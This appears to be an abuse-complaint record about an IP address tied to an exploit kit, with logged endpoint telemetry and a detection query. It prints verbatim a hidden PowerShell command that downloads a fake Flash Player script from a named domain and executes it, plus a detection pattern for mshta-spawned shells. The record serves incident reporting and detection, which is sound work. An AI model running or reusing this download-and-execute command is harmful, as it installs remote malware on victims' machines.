On 2018-02-05 17:33:14 UTC, suspect-networks.io received the following abuse complaint from DTR on the IP address 23.227.196.139.


23.227.196.139
DTR
2018-02-05 17:33:14
exploit kit
Below is payload information originating from Switfway IP address 23.227.196.139 which has a domain name of (ui6eivinahost.org) register under Alan Mason.

Process Name: powershell.exe
Process MD5: 852D67A27E454BD389FA7F02A8CBE23F IOC Event Timestamp: 2018-02-05T04:35:29.993Z
Path: c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+[char][byte]92+'1517805326442.js';(New-Object System.Net.WebClient).DownloadFile('http'+'s://ui6eivinahost.org/2923218811894/1517804428259437/FlashPlayer.jse',$d);Invoke-Item $d;
IOC Query String: ((process_name:cmd.exe OR process_name:powershell.exe) parent_name:mshta.exe) Event Received Timestamp: [u'2018-02-05T04:40:07.540Z', u'2018-02-05T04:40:07.540Z']